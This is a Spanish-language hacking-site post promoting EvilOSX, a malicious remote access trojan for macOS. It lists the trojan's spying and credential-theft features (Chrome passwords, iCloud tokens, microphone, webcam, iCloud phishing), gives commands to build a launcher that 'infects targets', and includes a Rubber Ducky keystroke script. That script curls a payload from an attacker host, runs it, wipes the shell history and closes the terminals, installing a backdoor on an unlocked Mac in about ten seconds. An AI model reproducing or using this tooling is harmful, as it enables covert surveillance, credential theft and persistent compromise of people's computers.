EvilOSX – RAT(Remote Administration Tool) para MacOS/OS X

0
1644
views

RAT malicioso (herramienta de administración remota) para macOS / OS X.

Características

  • Emular una instancia de terminal
  • Sistema de módulo extensible simple
  • Sin dependencias (python puro)
  • No detectado por antivirus (cargas útiles encriptadas OpenSSL AES-256)
  • Persistente
  • Compatibilidad con GUI y CLI
  • Recuperar contraseñas de Chrome
  • Recuperar tokens y contactos de iCloud
  • Recuperar / monitorear el portapapeles
  • Recuperar el historial del navegador (Chrome y Safari)
  • Phish para contraseñas de iCloud a través de iTunes
  • Enumeración de respaldo de iTunes (iOS)
  • Grabe el micrófono
  • Toma capturas de pantalla de escritorio o una imagen usando la cámara web
  • Intenta obtener la raíz a través de la escalada de privilegios local

Cómo utilizar

Usuarios normales
El lado del servidor requiere python3 para ejecutarse.
El lado bot está escrito en python2 que ya está instalado en macOS / OS X.

Una vez que se instala python3, abra una terminal y escriba lo siguiente:

user@computer:$ # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Install dependencies required by the server
$ sudo pip3 install -r requirements.txt

# Go into the repository
$ cd EvilOSX

# Start listening for connections
$ python3 start.py

# Lastly, run the built launcher (see the builder tab) on your target(s)

Advertencia: Debido a que las cargas útiles se crean únicas para el sistema destino (automáticamente por el servidor), el servidor debe estar ejecutándose cuando cualquier bot se conecta por primera vez.

Usuarios avanzados

También hay una interfaz de línea de comando para aquellos que quieren usar esto a través de SSH:

user@computer:$ # Create a launcher to infect your target(s)
$ python3 start.py --builder

# Start the CLI
$ python3 start.py --cli --port 1337

screenshots

Motivación
Este proyecto fue creado para ser utilizado con Rubber Ducky, aquí está el sencillo script:

REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

user@computer:$ DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

tarda unos 10 segundos en instalar la puerta trasera en cualquier mac desbloqueada, lo cual es … bueno.

La terminal se deletrea de esa manera intencionalmente, en algunos sistemas no encontrarán la terminal de otra manera.
Para omitir el asistente de configuración del teclado, asegúrese de cambiar el VID y el PID que se pueden encontrar aquí. El teclado de aluminio (ISO) es probablemente el que está buscando.

Video

Descarga EvilOSX

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop